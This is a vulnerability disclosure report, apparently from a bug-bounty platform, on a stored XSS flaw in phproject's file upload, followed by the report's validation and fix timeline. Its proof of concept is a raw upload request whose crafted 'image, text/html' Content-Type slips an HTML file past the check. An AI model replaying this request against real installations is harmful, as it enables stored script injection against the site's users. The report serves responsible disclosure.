Unrestricted Upload of File with Dangerous Type in alanaktion/phproject


Reported on

Feb 14th 2022


When the user clicks on the file, the application will checking Content-Type to decide whether to download or display the data directly. However, due to incorrect checking, a vulnerability exists leads to Stored XSS. I recommend that the force action relies on the file format instead of Content-Type for safety.

Proof of Concept

  • Step 1: Login as demo user and go to https://demo.phproject.org/issues/1
  • Step 2: Call this request to upload file. Note that Content-Type must be "image, text/html" to pass the check.
POST /issues/upload HTTP/2
Host: demo.phproject.org
Cookie: XSRF-TOKEN=ed4de2a8f5b360f9aea473898318a501217eee224996925ff3ae8ff0bc80b02a; phproj_token=2da1ad903a0a52daba9781f455cbc3625b3b815df46ed9aec3fbc9a81896cf38
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------5089983053658145839550568449
Content-Length: 778
Origin: https://demo.phproject.org
Referer: https://demo.phproject.org/issues/1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

Content-Disposition: form-data; name="csrf-token"

Content-Disposition: form-data; name="issue_id"

Content-Disposition: form-data; name="attachment"; filename="tmp_html.html"
Content-Type: image, text/html

Content-Disposition: form-data; name="text"

Content-Disposition: form-data; name="notify"


  • Step 3: Go to https://demo.phproject.org/issues/1 and click the file, you will see alert popup
  • PoC: https://drive.google.com/file/d/1dl3Ym-rYnc5pE_NbpBriqXfqMZvlWjUL/view?usp=sharing


Attackers can bypass check for forcing to upload html file, leads to Stored XSS.


We are processing your report and will contact the alanaktion/phproject team within 24 hours. a year ago
We have contacted a member of the alanaktion/phproject team and are waiting to hear back a year ago
We have sent a follow up to the alanaktion/phproject team. We will try again in 7 days. a year ago
We have sent a second follow up to the alanaktion/phproject team. We will try again in 10 days. a year ago
We have sent a third and final follow up to the alanaktion/phproject team. This report is now considered stale. a year ago
Alan Hardman validated this vulnerability a year ago
nhiephon has been awarded the disclosure bounty
The fix bounty is now up for grabs
Alan Hardman marked this as fixed in 1.7.13 with commit 798453 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
files.php#L263 has been validated
to join this conversation